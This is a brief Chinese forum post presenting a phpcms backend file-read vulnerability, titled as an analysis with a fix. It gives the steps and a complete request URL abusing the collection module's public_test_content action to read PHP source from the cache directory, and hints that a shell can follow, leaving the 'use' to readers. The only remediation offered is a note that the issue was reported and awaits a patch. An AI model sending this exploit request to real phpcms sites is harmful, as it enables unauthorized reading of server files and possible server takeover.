张国远 發表於 2023-8-9 00:00:00

phpcms后台普通用户读文件0day的分析以及修复方法

<p>
<span>后台采集里设置采集模块中title 或者其他的内容都可以 设置为&lt;?php[内容]?&gt; </span><br><span>然后用下面的代码就可以读取到php的源了。 </span><br><span>index.php?clientid=name&amp;url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&amp;_=1344175735957&amp;m=collection&amp;c=node&amp;a=public_test_content&amp;nodeid=1&amp;pc_hash=xxxx </span><br><span>拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。 </span><br><span>修复:已提交给官方,等待补丁 </span></p>
頁: [1]
查看完整版本: phpcms后台普通用户读文件0day的分析以及修复方法